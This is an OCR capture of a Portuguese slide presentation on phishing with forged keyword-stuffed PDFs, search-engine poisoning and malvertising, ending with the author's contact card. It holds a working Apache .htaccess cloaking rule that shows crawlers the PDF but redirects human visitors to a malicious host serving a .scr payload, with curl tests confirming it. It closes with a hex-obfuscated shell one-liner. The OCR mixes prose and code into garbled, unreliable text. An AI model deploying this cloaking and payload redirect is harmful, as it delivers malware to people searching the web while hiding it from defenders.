Professional Documents
Culture Documents
<h2>D0CUM3NT0 PDF</h2>
OCR
Optical Character Recognition
<h2>F0RG3D PDF</h2>
<h3>ESTRUTURA - PDF OUTPUT</h3>
O intuito do criminoso ter em seus arquivos
forjados o mximo possvel de palavras
chaves vinculadas ao pblico alvo.
1.
2.
3.
4.
5.
6.
{imagem}
{ttulo randmico} - {data atual}
{palavras chaves randmicas}
{palavras chaves hashtag randmicas}
{texto complementar}
{palavras chaves formato links}
O lado do phisher
<h2>S3RVER S1DE</h2>
.htaccess MOD1FICADO
Para hackear de forma ARQU1VO
<ifmodule mod_rewrite.c>
expressiva e tambm
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} !(Googlebot|bingbot|Yahoo)
garante o acesso das
RewriteRule (.+\.pdf)$ http://www.sitemalicioso2.uk/exploit-pdf.scr [R=301,L]
vtimas a suas (URLS || </ifmodule>
arquivos maliciosos), O # TE5TE R3QUEST:
criminoso pode refinar o 0x27null@phishing:~$ curl localhost/teste/Carro.pdf -v | grep '301'
# RETURN HTTP HEADER:
arquivo .htaccess de
< HTTP/1.1 301 Moved Permanently
forma que o Bot de
< Server: Apache/2.4.12 (Ubuntu)
indexao (Web crawler) < Location: http://www.sitemalicioso2.uk/exploit-pdf.scr
tenha acesso ao seu
# TE5TE R3QUEST / SE7 USER-AGENT BOT:
0x27null@phishing:~$ curl -I localhos/tteste/Carro.pdf -v --user-agent \
contedo, mas no o
'XX/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)' -v | grep --color \
usurio alvo pois o
'pdf'
# RETURN HTTP HEADER:
mesmo direcionado
< HTTP/1.1 200 OK
para site de terceiros.
< Server: Apache/2.4.12 (Ubuntu)
< Content-Type: application/pdf)
Relao de confiana
<h2>600gl3 AdWord5</h2>
Alcance potencial
dirio
1K
57K
cliques
impresses
Anncio
Relao de confiana
<h2>BUSC4 1NF3CTAD4</h2>
R3SULTADO ORGNICO
R3SULTADO PATROCINADO
uma explorao de relao de confiana entre usurio e seu aplicativo web favorita, pois ele no vai oferecer o contedo carros usados,
para algum que de suma maioria curtir paginas(facebook) ou pesquisa keywords para cinema ou faz pesquisa de Corte e Costura.
Infogrfico
<h2>R3FERNC1A5</h2>
http://dompdf.github.com
https://www.elpescador.com.br/blog/index.php/phishing-engenharia-social-entenda-porque-essas-tecnica
https://support.google.com/drive/answer/176692?hl=pt-BR
https://scholar.google.com.br/intl/pt-BR/scholar/publishers.html#tech2
https://www.elpescador.com.br/blog/index.php/quatro-fatos-que-explicam-porque-o-phishing-e-a-maior-arma-do-cibercrime
https://support.google.com/webmasters/answer/6001181?hl=pt-br
http://httpd.apache.org/docs/2.2/pt-br/howto/htaccess.html
https://www.rapid7.com/db/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe
https://www.offensive-security.com/metasploit-unleashed/client-side-exploits
https://www.offensive-security.com/metasploit-unleashed/msfconsole
https://www.elpescador.com.br/blog/index.php/games-online-um-campo-minado-de-phishing
https://www.facebook.com/business/products/ads
https://support.google.com/webmasters/answer/1061943?hl=pt-BR
https://blog.malwarebytes.org/mobile-2/2013/12/android-pop-ups-warn-of-infection
https://www.microsoft.com/en-us/security/pc-security/antivirus-rogue.aspx
https://www.elpescador.com.br/blog/index.php/phishing-engenharia-social-entenda-porque-essas-tecnicas-estao-interligadas
http://g1.globo.com/tecnologia/blog/seguranca-digital/post/golpe-com-falsa-tela-azul-da-morte-e-veiculado-em-anuncios-na-web.html
https://blog.malwarebytes.org/fraud-scam/2015/09/malvertising-via-google-adwords-leads-to-fake-bsod
http://www.agenciamestre.com/seo/link-farm
http://help.adobe.com/livedocs/acrobat_sdk/10/Acrobat10_HTMLHelp/wwhelp/wwhimpl/common/html/wwhelp.htm?context=Acrobat10_SDK_HTMLHelp&file=JS_Dev_Overview.71.1.html
http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf
https://dl.packetstormsecurity.net/1411-exploits/googledoubleclick-redirect.txt
https://support.google.com/analytics/answer/1033981
<marquee>OBR1GAd0</marquee>
0x27null@phishing:~$ php c0n7a7o.php
[ + ] Nome:
Cleiton Pinheiro
[ + ] E-mail:
0x27null@gmail.com
[ + ] Twitter:
@0x27null
[ + ] Blog:
http://blog.0x27null.com
[ + ] GIT:
https://github.com/googleinurl
[ + ] Especialidade:
GED - Gambiarras Exploits Dorking
------------------------------------------------------------------------------------------0x27null@phishing:~$ POF=$(Z=`echo '6964' | xxd -r -p`;$Z;Y=`echo
'637572696F73697479206B696C6C65642074686520636174' | xxd -r -p`;echo $Y;W=`echo
'202045723420756d342076337a20756d20703435356172302078346d61646f20636f72756a342e2e20456c3320666f31207630617
2206e6f203376656e746f2063346d7075732070347274792e2e206520636169752064652063617234206e302058346f2e202d2d2
0462049204d' | xxd -r -p`;echo $W);echo $POF;